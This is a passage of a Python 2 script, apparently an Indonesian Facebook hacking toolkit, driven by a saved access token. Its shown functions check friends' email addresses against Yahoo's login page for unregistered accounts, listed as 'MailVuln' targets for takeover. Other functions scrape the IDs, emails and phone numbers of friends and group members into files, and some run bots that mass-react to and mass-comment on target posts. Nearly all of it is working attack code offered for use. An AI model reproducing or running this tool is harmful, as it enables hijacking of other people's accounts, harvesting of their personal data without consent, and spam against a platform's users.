print '\x1b[1;91m[!] Token Tidak Ada'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
friends = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
kimak = json.loads(friends.text)
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for w in kimak['data']:
jml += 1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get('https://graph.facebook.com/' + id + '?access_token=' + toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + nama
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + id
print '\x1b[1;91m[\xe2\x9e\xb9] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;97m ' + mail + ' [\x1b[1;92m' + vuln + '\x1b[1;97m]'
print 52 * '\x1b[1;97m\xe2\x95\x90'
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;92mEmail \x1b[1;91m:\x1b[1;91m ' + mail + ' \x1b[1;97m[\x1b[1;92m' + vulnot + '\x1b[1;97m]'
except KeyError:
pass
print '\n\x1b[1;91m[+] \x1b[1;97mSelesai'
print '\x1b[1;91m[+] \x1b[1;97mSimpan \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
menu_yahoo()
def yahoolist():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
files = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m: \x1b[1;97m')
try:
total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
